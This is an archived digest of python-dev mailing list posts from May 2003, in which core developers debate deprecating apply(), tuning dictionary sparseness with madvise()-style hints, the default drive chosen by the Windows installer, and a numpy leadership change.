Subject: [Python-Dev] Distutils using apply
In-Reply-To: "Your message of Mon, 05 May 2003 09:41:05 +0200."
 <3EB61591.5070204@lemburg.com>
References: <20030504185544.6010.qmail@green.zadka.com>
 <3EB61591.5070204@lemburg.com>
Message-ID: <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>

> Could someone please explain why apply() was marked deprecated ?

Becase it's more readable, more efficient, and more flexible to write
f(x, y, *t) than apply(f, (x, y) + t).

> The only reference I can find is in PEP 290 and that merely
> reports this "fact".
> 
> I'm -1 on deprecating apply(). Not only because it introduces yet
> another incompatiblity between Python versions, but also because it
> is still useful in the context of having a function which mimics
> a function call, e.g. for map() and other instance where you
> pass around functions as operators.

Then maybe we should add something like operator.__call__.

OTOH, you're lucky that map isn't deprecated yet in favor of list
comprehensions; I expect that Python 3.0 won't have map or filter
either.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May  5 13:03:58 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 08:03:58 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: "Your message of Mon, 05 May 2003 01:23:35 EDT."
 <20030505052335.GA37311@hishome.net>
References: <20030504185544.6010.qmail@green.zadka.com>
 <20030505052335.GA37311@hishome.net>
Message-ID: <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>

> I was wondering if a milder form of deprecation may be appropriate for
> some features such as the apply builtin:
> 
> 1. Add a notice in docstring 'not recommended for new code'
> 2. Move to 'obsolete' or 'backward compatibility' section in manual
> 3. Do NOT produce a warning (pychecker may still do that)
> 4. Do NOT plan removal of feature in a specific future release

The form of deprecation used for apply() is already very mild (you
don't get a warning unless you do -Wall).  I don't think Moshe's use
case is important enough to care; if Moshe cares, he can easily
construct a command line argument or warnings.filterwarning() call to
suppress the warnings he doesn't care about.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Mon May  5 13:30:30 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 05 May 2003 14:30:30 +0200
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>
References: <20030504185544.6010.qmail@green.zadka.com> <3EB61591.5070204@lemburg.com> <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EB65966.6090005@lemburg.com>

Guido van Rossum wrote:
>>Could someone please explain why apply() was marked deprecated ?
> 
> Becase it's more readable, more efficient, and more flexible to write
> f(x, y, *t) than apply(f, (x, y) + t).

True, but it's in wide use out there, so it shouldn't go until
Python 3 is out the door.

BTW, shouldn't these deprecations be listed in e.g PEP 4 ?

There doesn't seem to be a single place to look for deprecated
features and APIs (PEP 4 only lists modules).

I find it rather troublesome that deprecation seems to be using
stealth mode of operation in Python development -- discussions
about it rarely surface until someone complains about a warning
relating to it. There should be open discussions about whether
or not to deprecate functionality.

>>The only reference I can find is in PEP 290 and that merely
>>reports this "fact".
>>
>>I'm -1 on deprecating apply(). Not only because it introduces yet
>>another incompatiblity between Python versions, but also because it
>>is still useful in the context of having a function which mimics
>>a function call, e.g. for map() and other instance where you
>>pass around functions as operators.
> 
> Then maybe we should add something like operator.__call__.

Why remove a common API and reinvent it somewhere else ?

> OTOH, you're lucky that map isn't deprecated yet in favor of list
> comprehensions; I expect that Python 3.0 won't have map or filter
> either.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 05 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        50 days left



From oren-py-d@hishome.net  Mon May  5 13:50:07 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 5 May 2003 08:50:07 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030505125007.GA20312@hishome.net>

On Mon, May 05, 2003 at 08:03:58AM -0400, Guido van Rossum wrote:
> > I was wondering if a milder form of deprecation may be appropriate for
> > some features such as the apply builtin:
> > 
> > 1. Add a notice in docstring 'not recommended for new code'
> > 2. Move to 'obsolete' or 'backward compatibility' section in manual
> > 3. Do NOT produce a warning (pychecker may still do that)
> > 4. Do NOT plan removal of feature in a specific future release
> 
> The form of deprecation used for apply() is already very mild (you
> don't get a warning unless you do -Wall).  I don't think Moshe's use
> case is important enough to care; if Moshe cares, he can easily
> construct a command line argument or warnings.filterwarning() call to
> suppress the warnings he doesn't care about.

My comment was not specifically about Moshe's use case - it's about the
meaning of deprecation in Python.

Does it always have to mean "start replacing because it *will* go away" 
as seems to be implied by PEP 5 or perhaps in some cases it could just 
mean "please don't use this in new code, okay" ?  

    Oren


From guido@python.org  Mon May  5 14:47:12 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 09:47:12 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: Your message of "Mon, 05 May 2003 14:30:30 +0200."
 <3EB65966.6090005@lemburg.com>
References: <20030504185544.6010.qmail@green.zadka.com> <3EB61591.5070204@lemburg.com> <200305051202.h45C28E24795@pcp02138704pcs.reston01.va.comcast.net>
 <3EB65966.6090005@lemburg.com>
Message-ID: <200305051347.h45DlCp30562@odiug.zope.com>

> Guido van Rossum wrote:
> >>Could someone please explain why apply() was marked deprecated ?
> > 
> > Becase it's more readable, more efficient, and more flexible to write
> > f(x, y, *t) than apply(f, (x, y) + t).
> 
> True, but it's in wide use out there, so it shouldn't go until
> Python 3 is out the door.

And it won't.  But that doesn't mean we can't add a PendingDeprecation
warning for it.

> BTW, shouldn't these deprecations be listed in e.g PEP 4 ?
> 
> There doesn't seem to be a single place to look for deprecated
> features and APIs (PEP 4 only lists modules).

That's a problem indeed.

> I find it rather troublesome that deprecation seems to be using
> stealth mode of operation in Python development -- discussions
> about it rarely surface until someone complains about a warning
> relating to it. There should be open discussions about whether
> or not to deprecate functionality.

I believe the discussions are open enough (things like this are never
decided at PythonLabs, but always brought out on python-dev).  But
it's easy to miss these discussions, and the records aren't always
clear.

> > Then maybe we should add something like operator.__call__.
> 
> Why remove a common API and reinvent it somewhere else ?

To reflect its demoted status.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Mon May  5 14:50:05 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 09:50:05 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: Your message of "Mon, 05 May 2003 08:50:07 EDT."
 <20030505125007.GA20312@hishome.net>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net>
 <20030505125007.GA20312@hishome.net>
Message-ID: <200305051350.h45Do5c30595@odiug.zope.com>

> My comment was not specifically about Moshe's use case - it's about
> the meaning of deprecation in Python.
> 
> Does it always have to mean "start replacing because it *will* go
> away" as seems to be implied by PEP 5 or perhaps in some cases it
> could just mean "please don't use this in new code, okay" ?

I think that can be safely left up to the individual programmer, who
has a better idea (hopefully) on the life expectancy of his code.  We
try to give guidance about the urgency of the deprecation e.g. in PEPs
or by using the normally-silent PendingDeprecation (which suggests
it's not urgent :-).

--Guido van Rossum (home page: http://www.python.org/~guido/)



From aahz@pythoncraft.com  Mon May  5 14:52:01 2003
From: aahz@pythoncraft.com (Aahz)
Date: Mon, 5 May 2003 09:52:01 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001501c312e8$bd892420$125ffea9@oemcomputer>
References: <LNBBLJKPBEHFEDALKOLCOEPDEEAB.tim.one@comcast.net> <001501c312e8$bd892420$125ffea9@oemcomputer>
Message-ID: <20030505135201.GA14870@panix.com>

How about this: when we create read-only dicts, you add an optional
argument that re-packs the dict and optimizes for space or speed.  That
way, the dict can be analyzed to provide appropriate results.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From skip@pobox.com  Mon May  5 15:34:14 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 09:34:14 -0500
Subject: [Python-Dev] How to test this?
Message-ID: <16054.30310.489999.134263@montanaro.dyndns.org>

I just added a patch file to <http://python.org/sf/731501>.  It doesn't
include any test cases, since that requires an old db hash v2 file present.
Is it okay to check in a dummy file to Lib/test for this purpose?

Thanks,

Skip



From BPettersen@NAREX.com  Mon May  5 15:55:02 2003
From: BPettersen@NAREX.com (Bjorn Pettersen)
Date: Mon, 5 May 2003 08:55:02 -0600
Subject: [Python-Dev] Windows installer request...
Message-ID: <60FB8BB7F0EFC7409B75EEEC13E20192022DE1FD@admin56.narex.com>

Would it be possible for the windows installer to use $SYSTEMDRIVE$ as
the default installation drive instead of C:? (On my XP box, C: is my
zip-drive, and E: is my SYSTEMDRIVE(*) -- I'm now re-installing :-)

If it's considered a good idea, and someone can point me to where the
change has to be made, I'd be more than willing to produce a patch...

-- bjorn

(*) Don't ask, MS wisdom I guess. Oh, and if you don't have a C: drive,
all you WinExplorer icons disappear (subst C: a: and it works :-) In any
case, I'm not brave enough to try to change it <wink>.


From oren-py-d@hishome.net  Mon May  5 15:58:06 2003
From: oren-py-d@hishome.net (Oren Tirosh)
Date: Mon, 5 May 2003 10:58:06 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: <200305051350.h45Do5c30595@odiug.zope.com>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net> <20030505125007.GA20312@hishome.net> <200305051350.h45Do5c30595@odiug.zope.com>
Message-ID: <20030505145806.GA46311@hishome.net>

On Mon, May 05, 2003 at 09:50:05AM -0400, Guido van Rossum wrote:
> > My comment was not specifically about Moshe's use case - it's about
> > the meaning of deprecation in Python.
> >
> > Does it always have to mean "start replacing because it *will* go
> > away" as seems to be implied by PEP 5 or perhaps in some cases it
> > could just mean "please don't use this in new code, okay" ?
>
> I think that can be safely left up to the individual programmer, who
> has a better idea (hopefully) on the life expectancy of his code.  We
> try to give guidance about the urgency of the deprecation e.g. in PEPs
> or by using the normally-silent PendingDeprecation (which suggests
> it's not urgent :-).

I'm afraid this is too subtle for me. I'll ask my question a third time,
hoping for an answer that a mere mortal can understand:

Are all deprecated features on death row or are some of them merely
serving a life sentence?

    Oren

 "Do not meddle in the affairs of BDFLs,
  for they are subtle and quick to anger"


From guido@python.org  Mon May  5 16:10:43 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 11:10:43 -0400
Subject: [Python-Dev] Distutils using apply
In-Reply-To: Your message of "Mon, 05 May 2003 10:58:06 EDT."
 <20030505145806.GA46311@hishome.net>
References: <20030504185544.6010.qmail@green.zadka.com> <20030505052335.GA37311@hishome.net> <200305051204.h45C3w424811@pcp02138704pcs.reston01.va.comcast.net> <20030505125007.GA20312@hishome.net> <200305051350.h45Do5c30595@odiug.zope.com>
 <20030505145806.GA46311@hishome.net>
Message-ID: <200305051510.h45FAhY31026@odiug.zope.com>

> Are all deprecated features on death row or are some of them merely
> serving a life sentence?

They are all slated to go away.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Mon May  5 16:14:07 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 11:14:07 -0400
Subject: [Python-Dev] Windows installer request...
In-Reply-To: <60FB8BB7F0EFC7409B75EEEC13E20192022DE1FD@admin56.narex.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEBGFJAA.tim.one@comcast.net>

[Bjorn Pettersen]
> Would it be possible for the windows installer to use $SYSTEMDRIVE$ as
> the default installation drive instead of C:? (On my XP box, C: is my
> zip-drive, and E: is my SYSTEMDRIVE(*) -- I'm now re-installing :-)

Are you saying that the "Select Destination Directory" dialog box doesn't
allow you to select your E: drive?  Or just that you'd rather not need to
select the drive you want?

> If it's considered a good idea, and someone can point me to where the
> change has to be made, I'd be more than willing to produce a patch...

I apparently left this comment in the Wise script:

    Note from Tim:  doesn't seem to be a way to get the true boot drive,
    the Wizard hardcodes "C".

So, AFAIK, there isn't a straightforward way to get Wise 8.14 to suggest a
drive other than C:.  Perhaps it would work better for you if I removed the
Wizard-generated hardcoded "C:" (I don't know which drive Wise would pick
then), but since yours is the only complaint about this I've seen, and I
have no way to test such a change, I'm very reluctant to fiddle with it.



From Jack.Jansen@oratrix.com  Mon May  5 16:35:55 2003
From: Jack.Jansen@oratrix.com (Jack Jansen)
Date: Mon, 5 May 2003 17:35:55 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <001301c31290$fcea25e0$125ffea9@oemcomputer>
Message-ID: <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>

I sort-of agree with Guido that any calls to optimize dictionaries may
do more good than bad, but I think that if we make the interface
sufficiently abstract we may have something that may work. I was 
thinking
of something analogous to madvise(): the user can specify high level 
access
patterns.

For Python dictionaries the access patterns would probably be
- I'm going to write a lot of stuff
- I'm done writing, and from now on I'm mainly going to read
- I haven't a clue what I'm going to do

Especially the "I'm going to read from now on" could be put to good use,
for instance after completing the dictionary of a class.
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -



From skip@pobox.com  Mon May  5 16:43:55 2003
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 5 May 2003 10:43:55 -0500
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
Message-ID: <16054.34491.64051.134832@montanaro.dyndns.org>

    Jack> I was thinking of something analogous to madvise(): ...

Quick, everyone who's used madvise() please raise your hand...  I'll bet a
beer most people (even on this list) have never put it to good use.  We all
know Tim probably has just because he's Tim, and apparently Jack has.
Anyone else?  Guido, have you ever been tempted?

Skip


From guido@python.org  Mon May  5 16:58:44 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 11:58:44 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Your message of "Mon, 05 May 2003 10:43:55 CDT."
 <16054.34491.64051.134832@montanaro.dyndns.org>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
 <16054.34491.64051.134832@montanaro.dyndns.org>
Message-ID: <200305051558.h45Fwi531325@odiug.zope.com>

>     Jack> I was thinking of something analogous to madvise(): ...
> 
> Quick, everyone who's used madvise() please raise your hand...  I'll bet a
> beer most people (even on this list) have never put it to good use.  We all
> know Tim probably has just because he's Tim, and apparently Jack has.
> Anyone else?  Guido, have you ever been tempted?

What's madvise()? :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paul@pfdubois.com  Mon May  5 17:13:17 2003
From: paul@pfdubois.com (Paul Dubois)
Date: Mon, 5 May 2003 09:13:17 -0700
Subject: [Python-Dev] Election of Todd Miller as head of numpy team
Message-ID: <000001c31321$3dc958c0$6801a8c0@NICKLEBY>

Todd Miller has been elected as the new Head of the Numeric Python
development team. 

I am still an active developer, but it was time to rotate responsibilities.
We especially need help with Numeric maintenance while Todd is working on
Numarray.

Thanks to all of you who helped me during my tenure.

Remember, when you see Todd, the expected greeting to the NummieHead is a
salute with more than one finger, accompanied by the cry, "Ni Ni Numpy!".
See the file DEVELOPERS in the distribution for our "constitution".

Paul



From aleax@aleax.it  Mon May  5 17:42:02 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 18:42:02 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <16054.34491.64051.134832@montanaro.dyndns.org>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com> <16054.34491.64051.134832@montanaro.dyndns.org>
Message-ID: <200305051842.02937.aleax@aleax.it>

On Monday 05 May 2003 05:43 pm, Skip Montanaro wrote:
>     Jack> I was thinking of something analogous to madvise(): ...
>
> Quick, everyone who's used madvise() please raise your hand...  I'll bet a
> beer most people (even on this list) have never put it to good use.  We all
> know Tim probably has just because he's Tim, and apparently Jack has.

I used madvise extensively (and quite successfully) back when I was the
senior software consultant responsible for the lower-levels of a variety of
Unix-system ports of a line of mechanical CAD products.  And I loved and
still love the general concept -- let me advise an optimizer (so it can do
whatever -- be it a little or a lot -- rather than spend energy trying to 
guess what in blazes I may be doing:-).


Alex



From guido@python.org  Mon May  5 17:47:06 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 12:47:06 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Your message of "Mon, 05 May 2003 18:42:02 +0200."
 <200305051842.02937.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com> <16054.34491.64051.134832@montanaro.dyndns.org>
 <200305051842.02937.aleax@aleax.it>
Message-ID: <200305051647.h45Gl6N04048@odiug.zope.com>

> I used madvise extensively (and quite successfully) back when I was
> the senior software consultant responsible for the lower-levels of a
> variety of Unix-system ports of a line of mechanical CAD products.
> And I loved and still love the general concept -- let me advise an
> optimizer (so it can do whatever -- be it a little or a lot --
> rather than spend energy trying to guess what in blazes I may be
> doing:-).

Hm.  How do you know that you were succesful?  I could think of an
implementation that's similar to those "press to cross" buttons you
see at some intersections, and which seem to have no effect whatsoever
on the traffic lights. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jeremy@zope.com  Mon May  5 18:11:50 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 05 May 2003 13:11:50 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051842.02937.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <42A588E4-7F0F-11D7-B65D-003065517236@oratrix.com>
 <16054.34491.64051.134832@montanaro.dyndns.org>
 <200305051842.02937.aleax@aleax.it>
Message-ID: <1052154710.12534.14.camel@slothrop.zope.com>

On Mon, 2003-05-05 at 12:42, Alex Martelli wrote:
> On Monday 05 May 2003 05:43 pm, Skip Montanaro wrote:
> >     Jack> I was thinking of something analogous to madvise(): ...
> >
> > Quick, everyone who's used madvise() please raise your hand...  I'll bet a
> > beer most people (even on this list) have never put it to good use.  We all
> > know Tim probably has just because he's Tim, and apparently Jack has.
> 
> I used madvise extensively (and quite successfully) back when I was the
> senior software consultant responsible for the lower-levels of a variety of
> Unix-system ports of a line of mechanical CAD products.  And I loved and
> still love the general concept -- let me advise an optimizer (so it can do
> whatever -- be it a little or a lot -- rather than spend energy trying to 
> guess what in blazes I may be doing:-).

Have you seen the work on gray-box systems?

http://www.cs.wisc.edu/graybox/

The philosophy of this project seems to be "You can observe an awful lot
just by watching."  (Apologies to Yogi.)  The approach is to learn how a
particular service is implemented, e.g. what buffer-replacement
algorithm is used, by observing its behavior.  Then write an application
that exploits that knowledge to drive the system into optimized behavior
for  the application.  No madvise() necessary.

I wonder if the same can be done for dicts?  My first guess would be no,
because the sparseness is a fixed policy.

Jeremy




From aleax@aleax.it  Mon May  5 18:22:53 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 19:22:53 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051647.h45Gl6N04048@odiug.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051842.02937.aleax@aleax.it> <200305051647.h45Gl6N04048@odiug.zope.com>
Message-ID: <200305051922.53855.aleax@aleax.it>

On Monday 05 May 2003 06:47 pm, Guido van Rossum wrote:
> > I used madvise extensively (and quite successfully) back when I was
> > the senior software consultant responsible for the lower-levels of a
> > variety of Unix-system ports of a line of mechanical CAD products.
> > And I loved and still love the general concept -- let me advise an
> > optimizer (so it can do whatever -- be it a little or a lot --
> > rather than spend energy trying to guess what in blazes I may be
> > doing:-).
>
> Hm.  How do you know that you were succesful?  I could think of an

By measuring applications' performance on important benchmarks (mostly
not artificial ones, but rather actual benchmarks used in the past by some
customers to help them choose which CAD package to buy -- we treasured
those, at that firm, and had built up quite a portfolio of them over the 
years).  As CPUs and floating-point units became fast enough, more and
more of the speed issues with so-called "CPU intensive" bottlenecks in
mechanical-engineering CAD actually became related to memory-access
patterns (a phenomenon I had already observed when I worked on IBM
multi-CPU mainframes with vector-units, being sold as "supercomputers" 
but in fact still having complex and deep memory hierarchies -- Cray guys
of the time such as Tim no doubt had it easier!-).

> implementation that's similar to those "press to cross" buttons you
> see at some intersections, and which seem to have no effect whatsoever
> on the traffic lights. :-)

Yes, there were a few of those, too.  That's part of what's cool about
an "advise" operation: it IS quite OK to implement it as a no-op, both in
the early times when you're moving an existing API to some new
platform, AND in (hypothetical:-) late maturity when your optimizer's
pattern-detector has become able to outsmart the programmer on a
regular basis.  C's "register" keyword is a familiar example: it was quite
precious in very early compilers with nearly nonexistent optimizers, it
was regularly ignored in new compilers for very limited (and particularly
register-limited) platforms, and it's invariably ignored now that optimizers
have become able to allocate registers better than most programmers.
(It should probably have been a #pragma rather than eat up a reserved
word, but that's just syntactic-level hindsight:-).


Alex



From aleax@aleax.it  Mon May  5 18:36:20 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 19:36:20 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <1052154710.12534.14.camel@slothrop.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051842.02937.aleax@aleax.it> <1052154710.12534.14.camel@slothrop.zope.com>
Message-ID: <200305051936.20078.aleax@aleax.it>

On Monday 05 May 2003 07:11 pm, Jeremy Hylton wrote:
   ...
> Have you seen the work on gray-box systems?
>
> http://www.cs.wisc.edu/graybox/
>
> The philosophy of this project seems to be "You can observe an awful lot
> just by watching."  (Apologies to Yogi.)  The approach is to learn how a
> particular service is implemented, e.g. what buffer-replacement
> algorithm is used, by observing its behavior.  Then write an application
> that exploits that knowledge to drive the system into optimized behavior
> for  the application.  No madvise() necessary.

Haven't read that URL, but this seems to summarize the way we had
to work with Fortran compilers on 3090-VF's back in the late '80s -- no
way to explicitly advise the compiler about what and how to vectorize,
so, lots of experimentation and tweaking to find how what the (expletive
deleted) heuristics the GD beast was using, and how to outsmart it
and get it to vectorize what *WE* wanted rather than what *IT* thought
was good for us.

What fun!  And of course we got to redo it all over again when a new
compiler release came out.

No thanks.  I've paid my dues and I hope I will *NEVER* again have to
work with a system that thinks it's so smart it doesn't need my advisory
input -- or at least not on anything that's as performance-crucial as
those Fortran programs were (most of my work in IBM Research in
did with Rexx -- that's when I learned to love scripting! -- but then and
again we did have to crunch really huge batches of numbers).


Alex



From jeremy@zope.com  Mon May  5 18:41:35 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 05 May 2003 13:41:35 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051936.20078.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305051842.02937.aleax@aleax.it>
 <1052154710.12534.14.camel@slothrop.zope.com>
 <200305051936.20078.aleax@aleax.it>
Message-ID: <1052156494.12531.27.camel@slothrop.zope.com>

On Mon, 2003-05-05 at 13:36, Alex Martelli wrote:
> No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> work with a system that thinks it's so smart it doesn't need my advisory
> input -- or at least not on anything that's as performance-crucial as
> those Fortran programs were (most of my work in IBM Research in
> did with Rexx -- that's when I learned to love scripting! -- but then and
> again we did have to crunch really huge batches of numbers).

I think the graybox project is assuming that few people will have the
luxury of working with a system that accepts useful advisory input. 
Given that hypothesis, they built a tool for identifying what algorithm
is being used so that it can be tweaked appropriately.

Jeremy




From guido@python.org  Mon May  5 18:46:28 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 05 May 2003 13:46:28 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: Your message of "Mon, 05 May 2003 19:36:20 +0200."
 <200305051936.20078.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051842.02937.aleax@aleax.it> <1052154710.12534.14.camel@slothrop.zope.com>
 <200305051936.20078.aleax@aleax.it>
Message-ID: <200305051746.h45HkS009569@odiug.zope.com>

> No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> work with a system that thinks it's so smart it doesn't need my advisory
> input -- or at least not on anything that's as performance-crucial as
> those Fortran programs were [...]

I severely doubt that any Python apps are as performance-critical as
those Fortran programs were.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Mon May  5 18:40:18 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 13:40:18 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <1052154710.12534.14.camel@slothrop.zope.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHCECGFJAA.tim.one@comcast.net>

[Jeremy Hylton]
> Have you seen the work on gray-box systems?
>
> http://www.cs.wisc.edu/graybox/
>
> The philosophy of this project seems to be "You can observe an awful lot
> just by watching."  (Apologies to Yogi.)  The approach is to learn how a
> particular service is implemented, e.g. what buffer-replacement
> algorithm is used, by observing its behavior.  Then write an application
> that exploits that knowledge to drive the system into optimized behavior
> for  the application.  No madvise() necessary.
>
> I wonder if the same can be done for dicts?  My first guess would be no,
> because the sparseness is a fixed policy.

Well, a dict suffers damaging collisions or it doesn't.  If it does, the
best thing a user can do is rebuild the dict from scratch, inserting keys by
decreasing order of access frequency.  Then the most frequently accessed
keys come earliest in their collision chains.  Collisions simply don't
matter for rarely referenced keys.  (And, for example, if there *are* any
truly damaging collisions in __builtin__.__dict__, I expect this gimmick
would remove the damage.)  The size of the dict can be forced larger by
inserting artificial keys, if a user is insane <wink>.  It's always been
possible to eliminate dummy entries by doing "dict = dict.copy()".  Note
that because Python exposes the hash function used by dicts, you can write a
faithful low-level dict emulator in Python, and deduce what effects a
sequence of dict inserts and deletes will have.  So, overall, I expect
there's more you *could* do to speed dict access (in the handful of bad
cases it's not already good enough) yourself than Python could do for you.
You'd have to be nuts, though -- or writing papers on gray-box systems.



From tim.one@comcast.net  Mon May  5 18:54:41 2003
From: tim.one@comcast.net (Tim Peters)
Date: Mon, 05 May 2003 13:54:41 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051922.53855.aleax@aleax.it>
Message-ID: <BIEJKCLHCIOIHAGOKOLHGECIFJAA.tim.one@comcast.net>

[Alex Martelli]
> ...
> As CPUs and floating-point units became fast enough, more and more of
> the speed issues with so-called "CPU intensive" bottlenecks in
> mechanical-engineering CAD actually became related to memory-access
> patterns (a phenomenon I had already observed when I worked on IBM
> multi-CPU mainframes with vector-units, being sold as "supercomputers"
> but in fact still having complex and deep memory hierarchies -- Cray guys
> of the time such as Tim no doubt had it easier!-).

Indeed, Seymour Cray used to say a supercomputer is a machine that
transforms a CPU-bound program into an I/0-bound program, and didn't want
anything "in between" complicating that view.  As a result, optimizing
programs to run on Crays was, while still arbitrarily difficult, generally a
monotonic process, rarely beset by "mysterious regressions" along the way.

Now that gigabyte+ RAM boxes are becoming common, I wonder when someone will
figure out that the VM machinery is just slowing them down <0.9 wink>.



From aleax@aleax.it  Mon May  5 18:57:25 2003
From: aleax@aleax.it (Alex Martelli)
Date: Mon, 5 May 2003 19:57:25 +0200
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051746.h45HkS009569@odiug.zope.com>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer> <200305051936.20078.aleax@aleax.it> <200305051746.h45HkS009569@odiug.zope.com>
Message-ID: <200305051957.25403.aleax@aleax.it>

On Monday 05 May 2003 07:46 pm, Guido van Rossum wrote:
> > No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> > work with a system that thinks it's so smart it doesn't need my advisory
> > input -- or at least not on anything that's as performance-crucial as
> > those Fortran programs were [...]
>
> I severely doubt that any Python apps are as performance-critical as
> those Fortran programs were.

Yes, this may well be correct.  My only TRUE wish for tuning performance
of Python applications is to have SOME ways to measure memory
footprints with sensible guesses about where they come from -- THAT
is where I might gain hugely (by fighting excessive working sets through
selective flushing of caches, freelists, etc).


Alex



From jeremy@zope.com  Mon May  5 19:12:12 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 05 May 2003 14:12:12 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <200305051957.25403.aleax@aleax.it>
References: <001301c31290$fcea25e0$125ffea9@oemcomputer>
 <200305051936.20078.aleax@aleax.it>
 <200305051746.h45HkS009569@odiug.zope.com>
 <200305051957.25403.aleax@aleax.it>
Message-ID: <1052158331.12534.31.camel@slothrop.zope.com>

On Mon, 2003-05-05 at 13:57, Alex Martelli wrote:
> On Monday 05 May 2003 07:46 pm, Guido van Rossum wrote:
> > > No thanks.  I've paid my dues and I hope I will *NEVER* again have to
> > > work with a system that thinks it's so smart it doesn't need my advisory
> > > input -- or at least not on anything that's as performance-crucial as
> > > those Fortran programs were [...]
> >
> > I severely doubt that any Python apps are as performance-critical as
> > those Fortran programs were.
> 
> Yes, this may well be correct.  My only TRUE wish for tuning performance
> of Python applications is to have SOME ways to measure memory
> footprints with sensible guesses about where they come from -- THAT
